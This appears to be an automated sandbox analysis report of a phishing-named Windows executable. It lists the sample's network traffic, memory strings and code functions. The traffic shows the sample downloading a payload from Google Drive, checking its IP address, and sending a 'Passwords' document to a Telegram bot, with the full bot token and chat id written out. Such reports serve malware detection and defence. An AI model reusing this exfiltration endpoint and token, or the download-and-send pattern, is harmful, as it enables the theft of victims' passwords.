            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49809 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=119KyFiZiJfJBOPS6lEGdsdCsk4yk9tad HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=119KyFiZiJfJBOPS6lEGdsdCsk4yk9tad&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd13868a3c5d2eHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034D57000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034DAA000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034D57000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034DAA000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034BC0000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034D57000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034BAD000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034DAA000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034BC0000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034B41000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2558244299.0000000037416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2558244299.0000000037416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/D7~
            Source: REQUEST FOR QUOATION AND PRICES.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034D57000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034DAA000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739292779.00000000045CC000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739369349.00000000045CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2536020620.0000000004558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2536020620.0000000004558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/T
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2536444589.00000000060C0000.00000004.00001000.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2536020620.0000000004593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=119KyFiZiJfJBOPS6lEGdsdCsk4yk9tad
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2536020620.0000000004593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=119KyFiZiJfJBOPS6lEGdsdCsk4yk9tad9
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1797285940.00000000045CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739292779.00000000045CC000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739369349.00000000045CC000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2536020620.00000000045B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=119KyFiZiJfJBOPS6lEGdsdCsk4yk9tad&export=download
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739292779.00000000045CC000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739369349.00000000045CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739292779.00000000045CC000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739369349.00000000045CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739292779.00000000045CC000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739369349.00000000045CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739292779.00000000045CC000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739369349.00000000045CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739292779.00000000045CC000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739369349.00000000045CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739292779.00000000045CC000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739369349.00000000045CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739292779.00000000045CC000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739369349.00000000045CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739292779.00000000045CC000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739369349.00000000045CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
            Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49780 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.7:49789 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49830 version: TLS 1.2
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 5_2_004052D3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_004052D3
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 5_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,5_2_0040335A
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,10_2_0040335A
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 5_2_00404B105_2_00404B10
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 5_2_0040653F5_2_0040653F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_00404B1010_2_00404B10
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_0040653F10_2_0040653F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_0011432810_2_00114328
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_0011E6A810_2_0011E6A8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_001127B910_2_001127B9
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_00118DA010_2_00118DA0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_0011596810_2_00115968
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_00115F9010_2_00115F90
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_0011E6A710_2_0011E6A7
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_00112DD110_2_00112DD1
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DD624F10_2_36DD624F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DD160810_2_36DD1608
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDD78810_2_36DDD788
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDAF8010_2_36DDAF80
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDA92810_2_36DDA928
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DD5B2810_2_36DD5B28
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDCED810_2_36DDCED8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDCED710_2_36DDCED7
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDA4D010_2_36DDA4D0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDA4C010_2_36DDA4C0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDE6F010_2_36DDE6F0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDCA8010_2_36DDCA80
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDF85010_2_36DDF850
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDF84F10_2_36DDF84F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDCA7910_2_36DDCA79
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDA07810_2_36DDA078
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDA07710_2_36DDA077
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DD9C1F10_2_36DD9C1F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDE60F10_2_36DDE60F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DD160310_2_36DD1603
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDC62810_2_36DDC628
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDC62710_2_36DDC627
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DD9C2010_2_36DD9C20
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDC1D010_2_36DDC1D0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDC1C910_2_36DDC1C9
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DD97C810_2_36DD97C8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDF3F810_2_36DDF3F8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDF3F710_2_36DDF3F7
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDEF9010_2_36DDEF90
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDD78710_2_36DDD787
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DD518010_2_36DD5180
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DD97B910_2_36DD97B9
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDEFA010_2_36DDEFA0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDEB4810_2_36DDEB48
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDEB4710_2_36DDEB47
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDBD7810_2_36DDBD78
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DD937010_2_36DD9370
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DD517010_2_36DD5170
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDAF7010_2_36DDAF70
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DD936F10_2_36DD936F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDBD6810_2_36DDBD68
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DD590810_2_36DD5908
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDD33010_2_36DDD330
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDD32F10_2_36DDD32F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DDA92710_2_36DDA927
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF77F010_2_36DF77F0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF849010_2_36DF8490
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF957210_2_36DF9572
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF71A810_2_36DF71A8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF613010_2_36DF6130
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF7E4010_2_36DF7E40
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF98D010_2_36DF98D0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF46F810_2_36DF46F8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF46F710_2_36DF46F7
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF563F10_2_36DF563F
